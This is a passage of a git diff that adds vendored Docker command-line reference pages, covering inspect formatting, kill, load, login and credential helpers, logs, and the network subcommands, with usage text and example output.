+    $ docker inspect --format='{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' $INSTANCE_ID
+    {% endraw %}
+
+**Get an instance's MAC address:**
+
+For the most part, you can pick out any field from the JSON in a fairly
+straightforward manner.
+
+    {% raw %}
+    $ docker inspect --format='{{range .NetworkSettings.Networks}}{{.MacAddress}}{{end}}' $INSTANCE_ID
+    {% endraw %}
+
+**Get an instance's log path:**
+
+    {% raw %}
+    $ docker inspect --format='{{.LogPath}}' $INSTANCE_ID
+    {% endraw %}
+
+**Get a Task's image name:**
+
+    {% raw %}
+    $ docker inspect --format='{{.Container.Spec.Image}}' $INSTANCE_ID
+    {% endraw %}
+
+**List all port bindings:**
+
+One can loop over arrays and maps in the results to produce simple text
+output:
+
+    {% raw %}
+    $ docker inspect --format='{{range $p, $conf := .NetworkSettings.Ports}} {{$p}} -> {{(index $conf 0).HostPort}} {{end}}' $INSTANCE_ID
+    {% endraw %}
+
+**Find a specific port mapping:**
+
+The `.Field` syntax doesn't work when the field name begins with a
+number, but the template language's `index` function does. The
+`.NetworkSettings.Ports` section contains a map of the internal port
+mappings to a list of external address/port objects. To grab just the
+numeric public port, you use `index` to find the specific port map, and
+then `index` 0 contains the first object inside of that. Then we ask for
+the `HostPort` field to get the public address.
+
+    {% raw %}
+    $ docker inspect --format='{{(index (index .NetworkSettings.Ports "8787/tcp") 0).HostPort}}' $INSTANCE_ID
+    {% endraw %}
+
+**Get a subsection in JSON format:**
+
+If you request a field which is itself a structure containing other
+fields, by default you get a Go-style dump of the inner values.
+Docker adds a template function, `json`, which can be applied to get
+results in JSON format.
+
+    {% raw %}
+    $ docker inspect --format='{{json .Config}}' $INSTANCE_ID
+    {% endraw %}
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/kill.md b/vendor/github.com/docker/docker/docs/reference/commandline/kill.md
new file mode 100644
index 0000000000..32fde3d8b5
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/kill.md
@@ -0,0 +1,34 @@
+---
+title: "kill"
+description: "The kill command description and usage"
+keywords: "container, kill, signal"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# kill
+
+```markdown
+Usage:  docker kill [OPTIONS] CONTAINER [CONTAINER...]
+
+Kill one or more running containers
+
+Options:
+      --help            Print usage
+  -s, --signal string   Signal to send to the container (default "KILL")
+```
+
+The main process inside the container will be sent `SIGKILL`, or any
+signal specified with option `--signal`.
+
+> **Note:**
+> `ENTRYPOINT` and `CMD` in the *shell* form run as a subcommand of `/bin/sh -c`,
+> which does not pass signals. This means that the executable is not the container’s PID 1
+> and does not receive Unix signals.
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/load.md b/vendor/github.com/docker/docker/docs/reference/commandline/load.md
new file mode 100644
index 0000000000..04a5bc7e56
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/load.md
@@ -0,0 +1,53 @@
+---
+title: "load"
+description: "The load command description and usage"
+keywords: "stdin, tarred, repository"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# load
+
+```markdown
+Usage:  docker load [OPTIONS]
+
+Load an image from a tar archive or STDIN
+
+Options:
+      --help           Print usage
+  -i, --input string   Read from tar archive file, instead of STDIN.
+                       The tarball may be compressed with gzip, bzip, or xz
+  -q, --quiet          Suppress the load output but still outputs the imported images
+```
+
+Loads a tarred repository from a file or the standard input stream.
+Restores both images and tags.
+
+    $ docker images
+    REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
+    $ docker load < busybox.tar.gz
+    # […]
+    Loaded image: busybox:latest
+    $ docker images
+    REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
+    busybox             latest              769b9341d937        7 weeks ago         2.489 MB
+    $ docker load --input fedora.tar
+    # […]
+    Loaded image: fedora:rawhide
+    # […]
+    Loaded image: fedora:20
+    # […]
+    $ docker images
+    REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
+    busybox             latest              769b9341d937        7 weeks ago         2.489 MB
+    fedora              rawhide             0d20aec6529d        7 weeks ago         387 MB
+    fedora              20                  58394af37342        7 weeks ago         385.5 MB
+    fedora              heisenbug           58394af37342        7 weeks ago         385.5 MB
+    fedora              latest              58394af37342        7 weeks ago         385.5 MB
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/login.md b/vendor/github.com/docker/docker/docs/reference/commandline/login.md
new file mode 100644
index 0000000000..a0f35fd4d0
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/login.md
@@ -0,0 +1,122 @@
+---
+title: "login"
+description: "The login command description and usage"
+keywords: "registry, login, image"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# login
+
+```markdown
+Usage:  docker login [OPTIONS] [SERVER]
+
+Log in to a Docker registry.
+If no server is specified, the default is defined by the daemon.
+
+Options:
+      --help              Print usage
+  -p, --password string   Password
+  -u, --username string   Username
+```
+
+If you want to login to a self-hosted registry you can specify this by
+adding the server name.
+
+    example:
+    $ docker login localhost:8080
+
+
+`docker login` requires user to use `sudo` or be `root`, except when:
+
+1.  connecting to a remote daemon, such as a `docker-machine` provisioned `docker engine`.
+2.  user is added to the `docker` group.  This will impact the security of your system; the `docker` group is `root` equivalent.  See [Docker Daemon Attack Surface](https://docs.docker.com/security/security/#docker-daemon-attack-surface) for details.
+
+You can log into any public or private repository for which you have
+credentials.  When you log in, the command stores encoded credentials in
+`$HOME/.docker/config.json` on Linux or `%USERPROFILE%/.docker/config.json` on Windows.
+
+## Credentials store
+
+The Docker Engine can keep user credentials in an external credentials store,
+such as the native keychain of the operating system. Using an external store
+is more secure than storing credentials in the Docker configuration file.
+
+To use a credentials store, you need an external helper program to interact
+with a specific keychain or external store. Docker requires the helper
+program to be in the client's host `$PATH`.
+
+This is the list of currently available credentials helpers and where
+you can download them from:
+
+- D-Bus Secret Service: https://github.com/docker/docker-credential-helpers/releases
+- Apple macOS keychain: https://github.com/docker/docker-credential-helpers/releases
+- Microsoft Windows Credential Manager: https://github.com/docker/docker-credential-helpers/releases
+
+### Usage
+
+You need to specify the credentials store in `$HOME/.docker/config.json`
+to tell the docker engine to use it:
+
+```json
+{
+	"credsStore": "osxkeychain"
+}
+```
+
+If you are currently logged in, run `docker logout` to remove
+the credentials from the file and run `docker login` again.
+
+### Protocol
+
+Credential helpers can be any program or script that follows a very simple protocol.
+This protocol is heavily inspired by Git, but it differs in the information shared.
+
+The helpers always use the first argument in the command to identify the action.
+There are only three possible values for that argument: `store`, `get`, and `erase`.
+
+The `store` command takes a JSON payload from the standard input. That payload carries
+the server address, to identify the credential, the user name, and either a password
+or an identity token.
+
+```json
+{
+	"ServerURL": "https://index.docker.io/v1",
+	"Username": "david",
+	"Secret": "passw0rd1"
+}
+```
+
+If the secret being stored is an identity token, the Username should be set to
+`<token>`.
+
+The `store` command can write error messages to `STDOUT` that the docker engine
+will show if there was an issue.
+
+The `get` command takes a string payload from the standard input. That payload carries
+the server address that the docker engine needs credentials for. This is
+an example of that payload: `https://index.docker.io/v1`.
+
+The `get` command writes a JSON payload to `STDOUT`. Docker reads the user name
+and password from this payload:
+
+```json
+{
+	"Username": "david",
+	"Secret": "passw0rd1"
+}
+```
+
+The `erase` command takes a string payload from `STDIN`. That payload carries
+the server address that the docker engine wants to remove credentials for. This is
+an example of that payload: `https://index.docker.io/v1`.
+
+The `erase` command can write error messages to `STDOUT` that the docker engine
+will show if there was an issue.
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/logout.md b/vendor/github.com/docker/docker/docs/reference/commandline/logout.md
new file mode 100644
index 0000000000..1635e2244b
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/logout.md
@@ -0,0 +1,30 @@
+---
+title: "logout"
+description: "The logout command description and usage"
+keywords: "logout, docker, registry"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# logout
+
+```markdown
+Usage:  docker logout [SERVER]
+
+Log out from a Docker registry.
+If no server is specified, the default is defined by the daemon.
+
+Options:
+      --help   Print usage
+```
+
+For example:
+
+    $ docker logout localhost:8080
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/logs.md b/vendor/github.com/docker/docker/docs/reference/commandline/logs.md
new file mode 100644
index 0000000000..891e10b55c
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/logs.md
@@ -0,0 +1,66 @@
+---
+title: "logs"
+description: "The logs command description and usage"
+keywords: "logs, retrieve, docker"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# logs
+
+```markdown
+Usage:  docker logs [OPTIONS] CONTAINER
+
+Fetch the logs of a container
+
+Options:
+      --details        Show extra details provided to logs
+  -f, --follow         Follow log output
+      --help           Print usage
+      --since string   Show logs since timestamp
+      --tail string    Number of lines to show from the end of the logs (default "all")
+  -t, --timestamps     Show timestamps
+```
+
+The `docker logs` command batch-retrieves logs present at the time of execution.
+
+> **Note**: this command is only functional for containers that are started with
+> the `json-file` or `journald` logging driver.
+
+For more information about selecting and configuring logging drivers, refer to
+[Configure logging drivers](https://docs.docker.com/engine/admin/logging/overview/).
+
+The `docker logs --follow` command will continue streaming the new output from
+the container's `STDOUT` and `STDERR`.
+
+Passing a negative number or a non-integer to `--tail` is invalid and the
+value is set to `all` in that case.
+
+The `docker logs --timestamps` command will add an [RFC3339Nano timestamp](https://golang.org/pkg/time/#pkg-constants)
+, for example `2014-09-16T06:17:46.000000000Z`, to each
+log entry. To ensure that the timestamps are aligned the
+nano-second part of the timestamp will be padded with zero when necessary.
+
+The `docker logs --details` command will add on extra attributes, such as
+environment variables and labels, provided to `--log-opt` when creating the
+container.
+
+The `--since` option shows only the container logs generated after
+a given date. You can specify the date as an RFC 3339 date, a UNIX
+timestamp, or a Go duration string (e.g. `1m30s`, `3h`). Besides RFC3339 date
+format you may also use RFC3339Nano, `2006-01-02T15:04:05`,
+`2006-01-02T15:04:05.999999999`, `2006-01-02Z07:00`, and `2006-01-02`. The local
+timezone on the client will be used if you do not provide either a `Z` or a
+`+-00:00` timezone offset at the end of the timestamp. When providing Unix
+timestamps enter seconds[.nanoseconds], where seconds is the number of seconds
+that have elapsed since January 1, 1970 (midnight UTC/GMT), not counting leap
+seconds (aka Unix epoch or Unix time), and the optional .nanoseconds field is a
+fraction of a second no more than nine digits long. You can combine the
+`--since` option with either or both of the `--follow` or `--tail` options.
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/menu.md b/vendor/github.com/docker/docker/docs/reference/commandline/menu.md
new file mode 100644
index 0000000000..d58afacd76
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/menu.md
@@ -0,0 +1,28 @@
+---
+title: "Command line reference"
+description: "Docker's CLI command description and usage"
+keywords: "Docker, Docker documentation, CLI, command line"
+identifier:  "smn_cli"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# The Docker commands
+
+This section contains reference information on using Docker's command line
+client. Each command has a reference page along with samples. If you are
+unfamiliar with the command line, you should start by reading about how to
+[Use the Docker command line](cli.md).
+
+You start the Docker daemon with the command line. How you start the daemon
+affects your Docker containers. For that reason you should also make sure to
+read the [`dockerd`](dockerd.md) reference page.
+
+For a list of Docker commands see [Command line reference guide](index.md).
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/network_connect.md b/vendor/github.com/docker/docker/docs/reference/commandline/network_connect.md
new file mode 100644
index 0000000000..52459a5d5f
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/network_connect.md
@@ -0,0 +1,100 @@
+---
+title: "network connect"
+description: "The network connect command description and usage"
+keywords: "network, connect, user-defined"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# network connect
+
+```markdown
+Usage:  docker network connect [OPTIONS] NETWORK CONTAINER
+
+Connect a container to a network
+
+Options:
+      --alias value           Add network-scoped alias for the container (default [])
+      --help                  Print usage
+      --ip string             IP Address
+      --ip6 string            IPv6 Address
+      --link value            Add link to another container (default [])
+      --link-local-ip value   Add a link-local address for the container (default [])
+```
+
+Connects a container to a network. You can connect a container by name
+or by ID. Once connected, the container can communicate with other containers in
+the same network.
+
+```bash
+$ docker network connect multi-host-network container1
+```
+
+You can also use the `docker run --network=<network-name>` option to start a container and immediately connect it to a network.
+
+```bash
+$ docker run -itd --network=multi-host-network busybox
+```
+
+You can specify the IP address you want to be assigned to the container's interface.
+
+```bash
+$ docker network connect --ip 10.10.36.122 multi-host-network container2
+```
+
+You can use `--link` option to link another container with a preferred alias
+
+```bash
+$ docker network connect --link container1:c1 multi-host-network container2
+```
+
+`--alias` option can be used to resolve the container by another name in the network
+being connected to.
+
+```bash
+$ docker network connect --alias db --alias mysql multi-host-network container2
+```
+You can pause, restart, and stop containers that are connected to a network.
+A container connects to its configured networks when it runs.
+
+If specified, the container's IP address(es) is reapplied when a stopped
+container is restarted. If the IP address is no longer available, the container
+fails to start. One way to guarantee that the IP address is available is
+to specify an `--ip-range` when creating the network, and choose the static IP
+address(es) from outside that range. This ensures that the IP address is not
+given to another container while this container is not on the network.
+
+```bash
+$ docker network create --subnet 172.20.0.0/16 --ip-range 172.20.240.0/20 multi-host-network
+```
+
+```bash
+$ docker network connect --ip 172.20.128.2 multi-host-network container2
+```
+
+To verify the container is connected, use the `docker network inspect` command. Use `docker network disconnect` to remove a container from the network.
+
+Once connected in network, containers can communicate using only another
+container's IP address or name. For `overlay` networks or custom plugins that
+support multi-host connectivity, containers connected to the same multi-host
+network but launched from different Engines can also communicate in this way.
+
+You can connect a container to one or more networks. The networks need not be the same type. For example, you can connect a single container bridge and overlay networks.
+
+## Related information
+
+* [network inspect](network_inspect.md)
+* [network create](network_create.md)
+* [network disconnect](network_disconnect.md)
+* [network ls](network_ls.md)
+* [network rm](network_rm.md)
+* [network prune](network_prune.md)
+* [Understand Docker container networks](https://docs.docker.com/engine/userguide/networking/)
+* [Work with networks](https://docs.docker.com/engine/userguide/networking/work-with-networks/)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/network_create.md b/vendor/github.com/docker/docker/docs/reference/commandline/network_create.md
new file mode 100644
index 0000000000..e238217d41
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/network_create.md
@@ -0,0 +1,202 @@
+---
+title: "network create"
+description: "The network create command description and usage"
+keywords: "network, create"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# network create
+
+```markdown
+Usage:	docker network create [OPTIONS] NETWORK
+
+Create a network
+
+Options:
+      --attachable           Enable manual container attachment
+      --aux-address value    Auxiliary IPv4 or IPv6 addresses used by Network
+                             driver (default map[])
+  -d, --driver string        Driver to manage the Network (default "bridge")
+      --gateway value        IPv4 or IPv6 Gateway for the master subnet (default [])
+      --help                 Print usage
+      --internal             Restrict external access to the network
+      --ip-range value       Allocate container ip from a sub-range (default [])
+      --ipam-driver string   IP Address Management Driver (default "default")
+      --ipam-opt value       Set IPAM driver specific options (default map[])
+      --ipv6                 Enable IPv6 networking
+      --label value          Set metadata on a network (default [])
+  -o, --opt value            Set driver specific options (default map[])
+      --subnet value         Subnet in CIDR format that represents a
+                             network segment (default [])
+```
+
+Creates a new network. The `DRIVER` accepts `bridge` or `overlay` which are the
+built-in network drivers. If you have installed a third party or your own custom
+network driver you can specify that `DRIVER` here also. If you don't specify the
+`--driver` option, the command automatically creates a `bridge` network for you.
+When you install Docker Engine it creates a `bridge` network automatically. This
+network corresponds to the `docker0` bridge that Engine has traditionally relied
+on. When you launch a new container with  `docker run` it automatically connects to
+this bridge network. You cannot remove this default bridge network, but you can
+create new ones using the `network create` command.
+
+```bash
+$ docker network create -d bridge my-bridge-network
+```
+
+Bridge networks are isolated networks on a single Engine installation. If you
+want to create a network that spans multiple Docker hosts each running an
+Engine, you must create an `overlay` network. Unlike `bridge` networks, overlay
+networks require some pre-existing conditions before you can create one. These
+conditions are:
+
+* Access to a key-value store. Engine supports Consul, Etcd, and ZooKeeper (Distributed store) key-value stores.
+* A cluster of hosts with connectivity to the key-value store.
+* A properly configured Engine `daemon` on each host in the cluster.
+
+The `dockerd` options that support the `overlay` network are:
+
+* `--cluster-store`
+* `--cluster-store-opt`
+* `--cluster-advertise`
+
+To read more about these options and how to configure them, see ["*Get started
+with multi-host network*"](https://docs.docker.com/engine/userguide/networking/get-started-overlay).
+
+While not required, it is a good idea to install Docker Swarm to
+manage the cluster that makes up your network. Swarm provides sophisticated
+discovery and server management tools that can assist your implementation.
+
+Once you have prepared the `overlay` network prerequisites you simply choose a
+Docker host in the cluster and issue the following to create the network:
+
+```bash
+$ docker network create -d overlay my-multihost-network
+```
+
+Network names must be unique. The Docker daemon attempts to identify naming
+conflicts but this is not guaranteed. It is the user's responsibility to avoid
+name conflicts.
+
+## Connect containers
+
+When you start a container, use the `--network` flag to connect it to a network.
+This example adds the `busybox` container to the `mynet` network:
+
+```bash
+$ docker run -itd --network=mynet busybox
+```
+
+If you want to add a container to a network after the container is already
+running, use the `docker network connect` subcommand.
+
+You can connect multiple containers to the same network. Once connected, the
+containers can communicate using only another container's IP address or name.
+For `overlay` networks or custom plugins that support multi-host connectivity,
+containers connected to the same multi-host network but launched from different
+Engines can also communicate in this way.
+
+You can disconnect a container from a network using the `docker network
+disconnect` command.
+
+## Specifying advanced options
+
+When you create a network, Engine creates a non-overlapping subnetwork for the
+network by default. This subnetwork is not a subdivision of an existing
+network. It is purely for ip-addressing purposes. You can override this default
+and specify subnetwork values directly using the `--subnet` option. On a
+`bridge` network you can only create a single subnet:
+
+```bash
+$ docker network create --driver=bridge --subnet=192.168.0.0/16 br0
+```
+
+Additionally, you also specify the `--gateway` `--ip-range` and `--aux-address`
+options.
+
+```bash
+$ docker network create \
+  --driver=bridge \
+  --subnet=172.28.0.0/16 \
+  --ip-range=172.28.5.0/24 \
+  --gateway=172.28.5.254 \
+  br0
+```
+
+If you omit the `--gateway` flag the Engine selects one for you from inside a
+preferred pool. For `overlay` networks and for network driver plugins that
+support it you can create multiple subnetworks.
+
+```bash
+$ docker network create -d overlay \
+  --subnet=192.168.0.0/16 \
+  --subnet=192.170.0.0/16 \
+  --gateway=192.168.0.100 \
+  --gateway=192.170.0.100 \
+  --ip-range=192.168.1.0/24 \
+  --aux-address="my-router=192.168.1.5" --aux-address="my-switch=192.168.1.6" \
+  --aux-address="my-printer=192.170.1.5" --aux-address="my-nas=192.170.1.6" \
+  my-multihost-network
+```
+
+Be sure that your subnetworks do not overlap. If they do, the network create
+fails and Engine returns an error.
+
+# Bridge driver options
+
+When creating a custom network, the default network driver (i.e. `bridge`) has
+additional options that can be passed. The following are those options and the
+equivalent docker daemon flags used for docker0 bridge:
+
+| Option                                           | Equivalent  | Description                                           |
+|--------------------------------------------------|-------------|-------------------------------------------------------|
+| `com.docker.network.bridge.name`                 | -           | bridge name to be used when creating the Linux bridge |
+| `com.docker.network.bridge.enable_ip_masquerade` | `--ip-masq` | Enable IP masquerading                                |
+| `com.docker.network.bridge.enable_icc`           | `--icc`     | Enable or Disable Inter Container Connectivity        |
+| `com.docker.network.bridge.host_binding_ipv4`    | `--ip`      | Default IP when binding container ports               |
+| `com.docker.network.driver.mtu`                  | `--mtu`     | Set the containers network MTU                        |
+
+The following arguments can be passed to `docker network create` for any
+network driver, again with their approximate equivalents to `docker daemon`.
+
+| Argument     | Equivalent     | Description                                |
+|--------------|----------------|--------------------------------------------|
+| `--gateway`  | -              | IPv4 or IPv6 Gateway for the master subnet |
+| `--ip-range` | `--fixed-cidr` | Allocate IPs from a range                  |
+| `--internal` | -              | Restrict external access to the network   |
+| `--ipv6`     | `--ipv6`       | Enable IPv6 networking                     |
+| `--subnet`   | `--bip`        | Subnet for network                         |
+
+For example, let's use `-o` or `--opt` options to specify an IP address binding
+when publishing ports:
+
+```bash
+$ docker network create \
+    -o "com.docker.network.bridge.host_binding_ipv4"="172.19.0.1" \
+    simple-network
+```
+
+### Network internal mode
+
+By default, when you connect a container to an `overlay` network, Docker also
+connects a bridge network to it to provide external connectivity. If you want
+to create an externally isolated `overlay` network, you can specify the
+`--internal` option.
+
+## Related information
+
+* [network inspect](network_inspect.md)
+* [network connect](network_connect.md)
+* [network disconnect](network_disconnect.md)
+* [network ls](network_ls.md)
+* [network rm](network_rm.md)
+* [network prune](network_prune.md)
+* [Understand Docker container networks](https://docs.docker.com/engine/userguide/networking/)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/network_disconnect.md b/vendor/github.com/docker/docker/docs/reference/commandline/network_disconnect.md
new file mode 100644
index 0000000000..42e976a500
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/network_disconnect.md
@@ -0,0 +1,43 @@
+---
+title: "network disconnect"
+description: "The network disconnect command description and usage"
+keywords: "network, disconnect, user-defined"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# network disconnect
+
+```markdown
+Usage:  docker network disconnect [OPTIONS] NETWORK CONTAINER
+
+Disconnect a container from a network
+
+Options:
+  -f, --force   Force the container to disconnect from a network
+      --help    Print usage
+```
+
+Disconnects a container from a network. The container must be running to disconnect it from the network.
+
+```bash
+  $ docker network disconnect multi-host-network container1
+```
+
+
+## Related information
+
+* [network inspect](network_inspect.md)
+* [network connect](network_connect.md)
+* [network create](network_create.md)
+* [network ls](network_ls.md)
+* [network rm](network_rm.md)
+* [network prune](network_prune.md)
+* [Understand Docker container networks](https://docs.docker.com/engine/userguide/networking/)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/network_inspect.md b/vendor/github.com/docker/docker/docs/reference/commandline/network_inspect.md
new file mode 100644
index 0000000000..bc0005e38e
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/network_inspect.md
@@ -0,0 +1,192 @@
+---
+title: "network inspect"
+description: "The network inspect command description and usage"
+keywords: "network, inspect, user-defined"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# network inspect
+
+```markdown
+Usage:  docker network inspect [OPTIONS] NETWORK [NETWORK...]
+
+Display detailed information on one or more networks
+
+Options:
+  -f, --format string   Format the output using the given Go template
+      --help            Print usage
+```
+
+Returns information about one or more networks. By default, this command renders all results in a JSON object. For example, if you connect two containers to the default `bridge` network:
+
+```bash
+$ sudo docker run -itd --name=container1 busybox
+f2870c98fd504370fb86e59f32cd0753b1ac9b69b7d80566ffc7192a82b3ed27
+
+$ sudo docker run -itd --name=container2 busybox
+bda12f8922785d1f160be70736f26c1e331ab8aaf8ed8d56728508f2e2fd4727
+```
+
+The `network inspect` command shows the containers, by id, in its
+results. For networks backed by multi-host network driver, such as Overlay,
+this command also shows the container endpoints in other hosts in the
+cluster. These endpoints are represented as "ep-{endpoint-id}" in the output.
+However, for swarm-scoped networks, only the endpoints that are local to the
+node are shown.
+
+You can specify an alternate format to execute a given
+template for each result. Go's
+[text/template](http://golang.org/pkg/text/template/) package describes all the
+details of the format.
+
+```bash
+$ sudo docker network inspect bridge
+[
+    {
+        "Name": "bridge",
+        "Id": "b2b1a2cba717161d984383fd68218cf70bbbd17d328496885f7c921333228b0f",
+        "Created": "2016-10-19T04:33:30.360899459Z",
+        "Scope": "local",
+        "Driver": "bridge",
+        "IPAM": {
+            "Driver": "default",
+            "Config": [
+                {
+                    "Subnet": "172.17.42.1/16",
+                    "Gateway": "172.17.42.1"
+                }
+            ]
+        },
+        "Internal": false,
+        "Containers": {
+            "bda12f8922785d1f160be70736f26c1e331ab8aaf8ed8d56728508f2e2fd4727": {
+                "Name": "container2",
+                "EndpointID": "0aebb8fcd2b282abe1365979536f21ee4ceaf3ed56177c628eae9f706e00e019",
+                "MacAddress": "02:42:ac:11:00:02",
+                "IPv4Address": "172.17.0.2/16",
+                "IPv6Address": ""
+            },
+            "f2870c98fd504370fb86e59f32cd0753b1ac9b69b7d80566ffc7192a82b3ed27": {
+                "Name": "container1",
+                "EndpointID": "a00676d9c91a96bbe5bcfb34f705387a33d7cc365bac1a29e4e9728df92d10ad",
+                "MacAddress": "02:42:ac:11:00:01",
+                "IPv4Address": "172.17.0.1/16",
+                "IPv6Address": ""
+            }
+        },
+        "Options": {
+            "com.docker.network.bridge.default_bridge": "true",
+            "com.docker.network.bridge.enable_icc": "true",
+            "com.docker.network.bridge.enable_ip_masquerade": "true",
+            "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0",
+            "com.docker.network.bridge.name": "docker0",
+            "com.docker.network.driver.mtu": "1500"
+        },
+        "Labels": {}
+    }
+]
+```
+
+Returns the information about the user-defined network:
+
+```bash
+$ docker network create simple-network
+69568e6336d8c96bbf57869030919f7c69524f71183b44d80948bd3927c87f6a
+$ docker network inspect simple-network
+[
+    {
+        "Name": "simple-network",
+        "Id": "69568e6336d8c96bbf57869030919f7c69524f71183b44d80948bd3927c87f6a",
+        "Created": "2016-10-19T04:33:30.360899459Z",
+        "Scope": "local",
+        "Driver": "bridge",
+        "IPAM": {
+            "Driver": "default",
+            "Config": [
+                {
+                    "Subnet": "172.22.0.0/16",
+                    "Gateway": "172.22.0.1"
+                }
+            ]
+        },
+        "Containers": {},
+        "Options": {},
+        "Labels": {}
+    }
+]
+```
+
+For swarm mode overlay networks `network inspect` also shows the IP address and node name 
+of the peers. Peers are the nodes in the swarm cluster which have at least one task attached 
+to the network. Node name is of the format `<hostname>-<unique ID>`.
+
+```bash
+$ docker network inspect ingress
+[
+    {
+        "Name": "ingress",
+        "Id": "j0izitrut30h975vk4m1u5kk3",
+        "Created": "2016-11-08T06:49:59.803387552Z",
+        "Scope": "swarm",
+        "Driver": "overlay",
+        "EnableIPv6": false,
+        "IPAM": {
+            "Driver": "default",
+            "Options": null,
+            "Config": [
+                {
+                    "Subnet": "10.255.0.0/16",
+                    "Gateway": "10.255.0.1"
+                }
+            ]
+        },
+        "Internal": false,
+        "Attachable": false,
+        "Containers": {
+            "ingress-sbox": {
+                "Name": "ingress-endpoint",
+                "EndpointID": "40e002d27b7e5d75f60bc72199d8cae3344e1896abec5eddae9743755fe09115",
+                "MacAddress": "02:42:0a:ff:00:03",
+                "IPv4Address": "10.255.0.3/16",
+                "IPv6Address": ""
+            }
+        },
+        "Options": {
+            "com.docker.network.driver.overlay.vxlanid_list": "256"
+        },
+        "Labels": {},
+        "Peers": [
+            {
+                "Name": "net-1-1d22adfe4d5c",
+                "IP": "192.168.33.11"
+            },
+            {
+                "Name": "net-2-d55d838b34af",
+                "IP": "192.168.33.12"
+            },
+            {
+                "Name": "net-3-8473f8140bd9",
+                "IP": "192.168.33.13"
+            }
+        ]
+    }
+]
+```
+
+## Related information
+
+* [network disconnect ](network_disconnect.md)
+* [network connect](network_connect.md)
+* [network create](network_create.md)
+* [network ls](network_ls.md)
+* [network rm](network_rm.md)
+* [network prune](network_prune.md)
+* [Understand Docker container networks](https://docs.docker.com/engine/userguide/networking/)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/network_ls.md b/vendor/github.com/docker/docker/docs/reference/commandline/network_ls.md
new file mode 100644
index 0000000000..a4f671d569
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/network_ls.md
@@ -0,0 +1,218 @@
+---
+title: "network ls"
+description: "The network ls command description and usage"
+keywords: "network, list, user-defined"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# docker network ls
+
+```markdown
+Usage:  docker network ls [OPTIONS]
+
+List networks
+
+Aliases:
+  ls, list
+
+Options:
+  -f, --filter filter   Provide filter values (e.g. 'driver=bridge')
+      --format string   Pretty-print networks using a Go template
+      --help            Print usage
